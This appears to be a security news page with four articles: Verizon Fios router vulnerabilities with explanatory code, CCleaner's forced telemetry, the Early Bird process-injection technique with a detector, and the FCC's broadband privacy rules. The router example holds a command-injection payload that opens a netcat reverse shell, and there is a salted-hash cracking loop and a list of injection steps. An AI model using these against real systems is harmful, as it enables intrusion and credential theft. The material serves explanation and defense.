Researcher Reveals Multiple Flaws in Verizon Fios Routers — PoC Released

A cybersecurity researcher at Tenable has discovered multiple security vulnerabilities in Verizon Fios Quantum Gateway Wi-Fi routers that could allow remote attackers to take complete control of affected routers, exposing every other device connected to them.
Currently used by millions of consumers in the United States, Verizon Fios Quantum Gateway Wi-Fi routers have been found vulnerable to three security vulnerabilities, identified as CVE-2019-3914, CVE-2019-3915, and CVE-2019-3916.
The flaws in question are authenticated command injection (with root privileges), login replay, and password salt disclosure vulnerabilities in the Verizon Fios Quantum Gateway router (G1100), according to technical details Chris Lyne, a senior research engineer at Tenable, shared with The Hacker News.
Authenticated Command Injection Flaw (CVE-2019-3914)
While reviewing a log file on his own router, Chris noticed that the “Access Control” rules in the Firewall settings of the router’s web interface did not properly sanitize the “hostname” parameter before passing its value into an iptables command executed on the device.
Injecting shell metacharacters into the hostname therefore lets an attacker alter that firewall command and run arbitrary commands on the router as root.
“Notice the iptables command being issued. Clearly, I must have entered tenable [keyword] in here at some point. That got me thinking… I wonder if I can inject an OS command into this,” the researcher said in a blog post.
“Clearly, this has to do with Access Control rules in the Firewall settings. I investigated the web interface to see if I could find tenable anywhere.”
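The pattern behind CVE-2019-3914 is worth seeing in code. The following is an added example, not Tenable’s PoC and not the G1100 firmware: a vulnerable rule builder that pastes the hostname into a shell command line, beside a hardened builder that validates the hostname against an allow-list and passes it as a single argv element. The iptables rule shape, the payload and all function names are constructed for illustration.

```python
"""Added example (not Tenable's PoC, not the router's code): how a firewall
"hostname" field turns into OS command injection, and the hardened builder.
The iptables rule shape, the payload and the builders are constructed."""
import re

# One DNS label: 1-63 chars, letters/digits/'-', no leading or trailing '-'.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_hostname(name: str) -> bool:
    """Allow-list check (RFC 1123 host-name syntax). Rejects shell
    metacharacters and a leading '-' (which would be argument injection)."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.rstrip(".").split("."))


def build_rule_unsafe(hostname: str) -> str:
    """Vulnerable pattern: input pasted into a command line that is handed to
    a shell. Anything after ';', '&&', '|', '$(' or a backtick is a new command."""
    return f"iptables -A FORWARD -d {hostname} -j DROP"


def build_rule_safe(hostname: str) -> list:
    """Hardened pattern: validate first, then pass the value as one argv
    element and run it without a shell, e.g. subprocess.run(argv)."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected hostname {hostname!r}")
    return ["iptables", "-A", "FORWARD", "-d", hostname, "-j", "DROP"]


def shell_commands(command_line: str) -> list:
    """Approximate how /bin/sh splits a line into separate commands, enough
    to show the extra command an injected hostname adds."""
    parts = re.split(r"\s*(?:;|&&|\|\|?)\s*", command_line)
    return [p.strip() for p in parts if p.strip()]


if __name__ == "__main__":
    payload = "evil.test; nc 203.0.113.5 4444 -e /bin/sh #"  # constructed payload
    print(shell_commands(build_rule_unsafe(payload)))
    print(build_rule_safe("tenable.com"))
    try:
        build_rule_safe(payload)
    except ValueError as exc:
        print("blocked:", exc)
```

Note that switching to an argv list alone is not enough: a hostname of "-j" would still be parsed by iptables as an option, which is why the allow-list validation comes first and rejects anything that is not a syntactically valid host name.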
It should be noted, however, that exploiting CVE-2019-3914 requires authenticated access to the router’s web interface, which limits the attack surface unless victims are relying on the default or a weak password.
Also, affected routers don’t come with remote administration enabled by default, which further reduces the threat of Internet-based attacks.
“There are two attack scenarios that enable an attacker to execute commands remotely. First, the insider threat would allow an attacker to record the login sequence (salted hash) using a packet sniffer. Either through legitimate access (a house guest) or social engineering (customer support scam), an attacker could obtain the target router’s administrator password from the sticker on the router and public IP address. They can then either turn remote administration on, confirm it is enabled, or use the same social engineering ruse to have the victim enable it,” Chris told The Hacker News in an email interview.
“Then, the attacker can exploit CVE-2019-3914 remotely, from across the internet, to gain remote root shell access to the router’s underlying operating system. From here, they have control of the network. They can create back doors, record sensitive internet transactions, pivot to other devices, etc.”

As shown in the video demonstration, the router ships with an embedded Java Virtual Machine (JVM), so an attacker can simply upload a Java-based payload to obtain a reverse shell with root privileges and launch further attacks.
To obtain the Java reverse shell, the attacker only needs to upload and run a Java class. As the researcher put it, “I accomplished this by programming the HTTP listener to return a Base64-encoded, compiled Java class in the response body. Additionally, the Java code was compiled for the target JVM (Java SE 1.8).”
Besides the technical details and a video demonstration, the researcher has also released proof-of-concept exploit code for this vulnerability.
Login Replay And Password Salt Disclosure Flaws
The second vulnerability, identified as CVE-2019-3915, exists because the router’s web administration interface is served over plain HTTP rather than HTTPS.
It allows network-based attackers to intercept login requests using a packet sniffer and replay them to gain admin access to the web interface.
The third flaw, identified as CVE-2019-3916, allows an unauthenticated attacker to retrieve the value of the password salt by simply visiting a URL in a web browser.
Since the firmware does not enforce HTTPS, an attacker on the same network can capture a login request containing the salted SHA-512 password hash; combined with the salt obtained via CVE-2019-3916, that hash can be attacked offline to recover the plaintext password.
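To make the two flaws concrete, here is an added example (not Tenable’s code and not the router’s real login flow) that models a login scheme where the client sends a static salted hash over plain HTTP. It shows that the sniffed hash replays indefinitely, that a known salt turns the hash into an offline cracking target, and what a per-login server nonce changes. The hash construction SHA-512(salt || password), the salt value and the password are assumptions; the page does not give the router’s exact construction.

```python
"""Added example (not Tenable's code, not the router's login flow): replay
and offline cracking of a static salted hash sent over plain HTTP, beside a
nonce-based challenge that makes a sniffed response single-use.
Assumption: the hash is SHA-512(salt || password); values are constructed."""
import hashlib
import secrets
from typing import Iterable, Optional


def salted_hash(salt: str, password: str) -> str:
    # Assumed construction; the real ordering/encoding is not documented here.
    return hashlib.sha512((salt + password).encode()).hexdigest()


class StaticHashLogin:
    """Models the flawed scheme: the client sends SHA-512(salt || password)
    on every login, so the captured value *is* the credential."""

    def __init__(self, salt: str, password: str):
        self.salt = salt                    # salt is fetchable unauthenticated (CVE-2019-3916)
        self.stored = salted_hash(salt, password)

    def login(self, submitted_hash: str) -> bool:
        return secrets.compare_digest(submitted_hash, self.stored)


class NonceLogin:
    """Contrast: the server issues a fresh nonce per attempt and expects
    SHA-512(nonce || salted_hash). A sniffed response cannot be replayed.
    The salted hash is still password-equivalent to anyone who learns it,
    which is why the real fix on the page is HTTPS, not just a nonce."""

    def __init__(self, salt: str, password: str):
        self.stored = salted_hash(salt, password)
        self.pending = None

    def challenge(self) -> str:
        self.pending = secrets.token_hex(16)
        return self.pending

    @staticmethod
    def respond(nonce: str, salted: str) -> str:
        return hashlib.sha512((nonce + salted).encode()).hexdigest()

    def login(self, nonce: str, response: str) -> bool:
        ok = (self.pending is not None and nonce == self.pending
              and secrets.compare_digest(response, self.respond(nonce, self.stored)))
        self.pending = None                 # nonce is consumed either way
        return ok


def crack(salt: str, captured_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guessing: with the salt known, each candidate costs one SHA-512."""
    for candidate in wordlist:
        if salted_hash(salt, candidate) == captured_hash:
            return candidate
    return None


if __name__ == "__main__":
    salt, password = "a1b2c3", "Sticker-Pass-1"   # constructed values
    router = StaticHashLogin(salt, password)
    sniffed = salted_hash(salt, password)           # what a packet sniffer sees
    print("replay works:", router.login(sniffed), router.login(sniffed))
    print("cracked:", crack(salt, sniffed, ["password", "letmein", password]))
    hardened = NonceLogin(salt, password)
    n = hardened.challenge()
    r = NonceLogin.respond(n, sniffed)
    print("fresh:", hardened.login(n, r), "replayed:", hardened.login(n, r))
```

The wordlist here is three entries; against a real capture the same loop runs at SHA-512 speed over a full dictionary, which is the practical consequence of disclosing the salt to unauthenticated clients.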
Tenable responsibly reported these vulnerabilities to Verizon, who acknowledged the issues and addressed them in new firmware version 02.02.00.13, which will be applied automatically.
“However, they’ve [Verizon] since advised that they are still working to push auto updates to a small fraction of devices. Users are urged to confirm that their router is updated to version 02.02.00.13, and if not, contact Verizon for more information.”
At the time of writing, a simple Shodan search revealed nearly 15,000 Verizon Fios Quantum Gateway Wi-Fi routers with remote administration enabled that were reachable from the Internet. How many of them are running the patched firmware version is unknown.

CCleaner Adds Data Collection Feature With No Way to Opt-Out

Like many others, do you also believe that the popular system-cleaning tool CCleaner performed better before Avast acquired the software from Piriform last year?
If so, the pop-up advertisements in the previous CCleaner version were not the last thing you would have to deal with.
Avast has released a new version of CCleaner 5.45 that not only always runs in the background, but also collects information about your system without giving you a way to turn the feature off.
CCleaner is a popular application, available in both free and premium versions, with over 2 billion downloads, that lets users clean up their Windows, Mac, and mobile devices to optimize and enhance performance.
Last year, CCleaner made headlines when it suffered one of the largest supply-chain malware attacks on record, in which hackers compromised its servers for over a month and replaced the original version of the software with a malicious one, infecting over 2.3 million users worldwide.
CCleaner Users Concern Over Active Monitoring and User Data Collection
This time the system-cleaning software is in the headlines due to the “monitoring and data collection” features Avast has added over the past few months to the popular system optimizer.
Here’s the timeline:
CCleaner 5.43 released in May—removes the option to opt out of data-sharing feature for users of the free software version.
CCleaner 5.44 released in June—adds pop-up advertisements.
CCleaner 5.45 released in July—forces Active Monitoring and heartbeat features.
These monitoring elements of CCleaner send user data such as anonymous system usage data back to the company’s servers, and continuously scan the system to alert users when they find junk or browser files, as first reported by Techdows.
What’s concerning is that even after turning off the Active Monitoring feature from CCleaner’s menus, it turns back ON automatically whenever users reboot their computer or close the software.
In its changelog for CCleaner 5.45, Avast notes it “added more detailed reporting for bug fixes and product improvements.”
Besides this, CCleaner now also sends a heartbeat every 12 hours that reports up-to-date usage statistics to Avast, which the company says allows it to deliver bug fixes and product improvements faster.
When asked about it on its forum, CCleaner said heartbeat sends only “non-personal, absolutely non-identifiable usage information to improve CCleaner.”
Though Avast says the information CCleaner gathers is entirely anonymous, users on various internet forums expressed concern about Avast’s data-sharing practices, saying that the company ruined their favorite tool after acquiring it.
Moreover, CCleaner’s privacy policy also says that it can share collected information with third-party companies.
“We reserve the right to store and use the information collected by our software. We may publish or share that information with third parties that are not part of the Avast Group, but we will only ever do so after anonymizing the data,” CCleaner’s privacy policy says.
“We reserve the right to store and use the information collected by our software and to share such information among the Avast Group to improve our current and future products and services, to help us develop new products and services, and to better understand the behavior of our users.”
Avast Promises to Fix CCleaner Privacy Issues
In response to the users’ complaints about Active Monitoring, Avast said on its forum that the company will offer separate menu items for turning off Active Monitoring and sending anonymous usage data (heartbeat).
“We will separate out Active Monitoring (junk cleaning alerts and browser cleaning alerts), and heartbeat (anonymous usage analytics) features in the UI, and we will give you the ability to control these individually,” the company said.
“We will take this opportunity to rename the Advanced Monitoring features in CCleaner to make their functions clearer.”
Avast said the company will roll out these changes in the coming weeks, so users are advised to hold off on upgrading to version 5.45 until the new update is available to download.
Those who have already upgraded to version 5.45 can stop Active Monitoring by terminating the CCleaner process with Task Manager or a third-party process manager; since the feature re-enables itself on reboot or when the software is closed, this has to be repeated until the next version arrives.

Hackers Found Using A New Code Injection Technique to Evade Detection

While performing in-depth analysis of various malware samples, security researchers at Cyberbit found a new code injection technique, dubbed Early Bird, being used by at least three different sophisticated malware families to help attackers evade detection.
As its name suggests, Early Bird is a “simple yet powerful” technique that allows attackers to inject malicious code into a legitimate process before its main thread starts, thereby running before the user-mode hooks that most anti-malware products place in a process.
The Early Bird code injection technique “loads the malicious code in a very early stage of thread initialization, before many security products place their hooks—which allows the malware to perform its malicious actions without being detected,” the researchers said.
The technique is similar in spirit to the AtomBombing code injection technique, which avoids the easy-to-detect API calls that classic injection relies on, allowing malware to inject code into processes in a way that many anti-malware tools do not detect.

The Early Bird code injection method relies on Windows Asynchronous Procedure Calls (APCs), a built-in mechanism that lets code be queued for execution in the context of a particular thread.
Here is a brief step-by-step explanation of how an attacker can inject malicious code into a legitimate process so that it executes before an anti-malware program gets a chance to hook or scan it.
Create a suspended process of a legitimate Windows process (e.g., svchost.exe)
Allocate memory in that process (svchost.exe) and write the malicious code into the allocated memory region,
Queue an asynchronous procedure call (APC) to the main thread of that process (svchost.exe),
An APC only runs when its target thread enters an alertable state; when the suspended main thread is resumed, the thread’s own initialization code calls NtTestAlert before the process entry point runs, which drains the APC queue, so the malicious code executes before the main thread and before most security products have installed their hooks.
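The four steps above form a distinctive call sequence from the caller’s side, which is what a defender can key on. The following is an added example, not Cyberbit’s code: a detector that walks a process-monitoring trace and reports a caller/target pair only when a CREATE_SUSPENDED process creation is followed by remote allocation, a memory write and an APC queue before the thread is resumed. The event format (one dict per API call with the caller pid, target pid and creation flags) and the sample trace are constructed assumptions; adapt the field names to your EDR, ETW or Sysmon feed.

```python
"""Added example (not Cyberbit's code): flag the Early Bird call chain in a
process-monitoring trace. Event format and sample trace are constructed."""
CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit documented for CreateProcess

# Malware often calls the Nt* functions directly; fold them into one name.
ALIASES = {
    "CreateProcessA": "CreateProcess", "CreateProcessW": "CreateProcess",
    "CreateProcessInternalW": "CreateProcess", "NtCreateUserProcess": "CreateProcess",
    "NtAllocateVirtualMemory": "VirtualAllocEx",
    "NtWriteVirtualMemory": "WriteProcessMemory",
    "NtQueueApcThread": "QueueUserAPC", "NtQueueApcThreadEx": "QueueUserAPC",
    "NtResumeThread": "ResumeThread", "NtResumeProcess": "ResumeThread",
}

# Steps that must all land on the suspended process before it is resumed.
INJECTION_STEPS = {"VirtualAllocEx", "WriteProcessMemory", "QueueUserAPC"}


def find_early_bird(events):
    """Return one finding per (caller pid, target pid) that completes the chain.
    A suspended create followed directly by ResumeThread (debuggers, installers)
    never accumulates the injection steps and is not reported; injection into an
    already-running process (classic APC injection) has no suspended create and
    is likewise left to other rules."""
    pending = {}   # (caller_pid, target_pid) -> {"image": str, "steps": set}
    findings = []
    for ev in events:
        api = ALIASES.get(ev["api"], ev["api"])
        key = (ev["pid"], ev["target_pid"])
        if api == "CreateProcess":
            if ev.get("flags", 0) & CREATE_SUSPENDED:
                pending[key] = {"image": ev.get("image", "?"), "steps": set()}
            else:
                pending.pop(key, None)
        elif api in INJECTION_STEPS and key in pending:
            pending[key]["steps"].add(api)
        elif api == "ResumeThread" and key in pending:
            state = pending.pop(key)
            if state["steps"] == INJECTION_STEPS:
                findings.append({"technique": "early_bird_apc",
                                 "source_pid": ev["pid"],
                                 "target_pid": ev["target_pid"],
                                 "image": state["image"]})
    return findings


# Constructed trace: a debugger-style suspended start (benign), the Early Bird
# chain against svchost.exe (malicious), and a normal create (ignored).
SAMPLE_TRACE = [
    {"pid": 1200, "api": "CreateProcessW", "target_pid": 1300, "flags": 0x4, "image": "notepad.exe"},
    {"pid": 1200, "api": "ResumeThread", "target_pid": 1300},
    {"pid": 4242, "api": "NtCreateUserProcess", "target_pid": 5100, "flags": 0x4, "image": "svchost.exe"},
    {"pid": 4242, "api": "NtAllocateVirtualMemory", "target_pid": 5100, "protect": "PAGE_EXECUTE_READWRITE"},
    {"pid": 4242, "api": "NtWriteVirtualMemory", "target_pid": 5100},
    {"pid": 4242, "api": "NtWriteVirtualMemory", "target_pid": 5100},
    {"pid": 4242, "api": "NtQueueApcThread", "target_pid": 5100},
    {"pid": 4242, "api": "NtResumeThread", "target_pid": 5100},
    {"pid": 7000, "api": "CreateProcessW", "target_pid": 7001, "flags": 0x0, "image": "cmd.exe"},
    {"pid": 7000, "api": "VirtualAllocEx", "target_pid": 7001},
]

if __name__ == "__main__":
    for finding in find_early_bird(SAMPLE_TRACE):
        print(finding)
```

Keying the state on the caller/target pair rather than on the caller alone keeps a legitimately suspended process (pid 1300 above) from being blamed for writes the same caller later makes elsewhere, and accepting the Nt* names matters because the samples described on the page call into ntdll directly rather than through kernel32.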
According to the researchers, at least the following three malware families were found using Early Bird code injection in the wild:
“TurnedUp” backdoor, developed by an Iranian hacking group (APT33)
A variant of “Carberp” banking malware
“DorkBot” malware
Initially discovered by FireEye in September 2017, TurnedUp is a backdoor that is capable of exfiltrating data from the target system, creating reverse shells, taking screenshots as well as gathering system information.
Dating back to 2012, DorkBot is botnet malware distributed via links on social media, instant messaging apps or infected removable media; it is used to steal users’ credentials for online services, including banking services, to participate in distributed denial-of-service (DDoS) attacks, to send spam and to deliver other malware to victims’ computers.
Researchers have also provided a video demonstration, which shows the new Early Bird code injection technique in action.

The FCC just passed sweeping new rules to protect your online privacy

Federal regulators have approved unprecedented new rules to ensure broadband providers do not abuse their customers’ app usage and browsing history, mobile location data and other sensitive personal information generated while using the Internet.

The rules, passed Thursday in a 3-to-2 vote by the Federal Communications Commission, require Internet providers, such as Comcast and Verizon, to obtain their customers’ explicit consent before using or sharing that behavioral data with third parties, such as marketing firms.

Also covered by that requirement are health data, financial information, Social Security numbers and the content of emails and other digital messages. The measure allows the FCC to impose the opt-in rule on other types of information in the future, but certain types of data, such as a customer’s IP address and device identifier, are not subject to the opt-in requirement. The rules also force service providers to tell consumers clearly what data they collect and why, as well as to take steps to notify customers of data breaches.

“It’s the consumers’ information,” said FCC Chairman Tom Wheeler. “How it is used should be the consumers’ choice. Not the choice of some corporate algorithm.”

In the near term, what consumers see and experience on the Web is unlikely to change as a result of the rules; targeted advertising has become a staple of the Internet economy and will not be going away. But the regulations may lead to new ways in which consumers can control their Internet providers’ business practices. That could mean dialog boxes, new websites with updated privacy policies or other means of interaction with companies.

The fresh regulations come as Internet providers race to turn their customers’ behavioral data into opportunities to sell targeted advertising. No longer content to be the conduits to websites, social media and online video, broadband companies increasingly view the information they collect on users as they traverse the Web as a source of revenue in itself.

With its move, the FCC is seeking to bring Internet providers’ conduct in line with that of traditional telephone companies that have historically obeyed strict prohibitions on the unauthorized use or sale of call data.

But the Internet era has brought new challenges, in some cases creating different categories of personal information — and ways to use it — that did not exist in the telephone era. And as the line increasingly blurs between traditional network operators and online content companies, regulators have struggled to keep pace.

For example, Verizon’s acquisition of AOL and potential purchase of Yahoo are both aimed at monetizing Internet usage beyond the straightforward sale of broadband access.

With greater insights into customer behavior, the company could market additional services or content to its wireless subscribers as part of a bundle, policy analysts say. That arrangement could allow Verizon to effectively earn money twice from the same subscriber — once for the data plan, and then again when the customer consumes Verizon-affiliated content.

Although Thursday’s vote by the FCC requires companies, such as Verizon, to obtain explicit permission from consumers when it shares sensitive personal data with outside firms, it does not require broadband providers to ask permission before using the data themselves in certain ways — such as providing broadband service.

For instance, Verizon would be able to use a wireless subscriber’s usage history to recommend purchasing a larger mobile data plan. It could also use the customer’s information to market its home Internet service, Verizon FiOS, even though FiOS is a separate product operated by a different part of the company. In neither case would Verizon have to ask for the subscriber’s affirmative consent.

But Verizon would have to allow consumers the chance to opt out of having their usage history shared with other Verizon businesses that do not sell communications services, such as AOL or Yahoo, according to the rules.

Consumer advocates say it’s a step in the right direction, even if they would have preferred stricter requirements.

“It’s not so far off the mark that it guts the provision,” said Harold Feld, a senior vice president at the consumer advocacy group Public Knowledge. “It still provides sufficient protections for consumers to regard this as a positive step.”

A trade association for the cable industry criticized the regulations Thursday as “profoundly disappointing.”

“Today’s result speaks more to regulatory opportunism than reasoned policy,” said the NCTA — The Internet & Television Association.

The FCC measure also received pushback from Internet providers in the run-up to the vote, over complaints that telecom companies would now be treated differently from websites, such as Google and Facebook, which also use personal data for advertising purposes on a tremendous scale.

“There is no sound reason to subject broadband providers to a different set of rules than other Internet companies,” wrote AT&T in a regulatory filing last week. “This would … deny broadband providers the same opportunity other Internet companies have to participate in the fast-growing digital advertising market.”

But the FCC may have little jurisdiction — or appetite — for regulating the data practices of individual Web companies; Wheeler has repeatedly declined to extend new regulations to the sector.

Republican officials at the FCC opposed the new privacy rules, saying the different expectations for Internet providers and websites will create confusion among consumers.

“If the FCC truly believes that these new rules are necessary to protect consumer privacy, then the government now must move forward to ensure uniform regulation of all companies in the Internet ecosystem at the new baseline the FCC has set,” said FCC Commissioner Ajit Pai, who suggested that the Federal Trade Commission could accomplish the task.

Opponents of the rules have called it an unlawful use of FCC power, setting the stage for a potential lawsuit by the broadband industry to overturn the privacy regulations. Michael O’Rielly, a Republican FCC commissioner, said Thursday that he expects “extensive” legal challenges to the rules.

He also added the rules may have “unintended consequences.” For example, he said, it is unclear how the FCC’s privacy regulations will address a burgeoning Internet of Things — the name for a growing class of connected devices such as thermostats, refrigerators and even automobiles. How Internet providers can use and share the data generated by those appliances will remain an open question, O’Rielly said.

Brian Fung covers technology for The Washington Post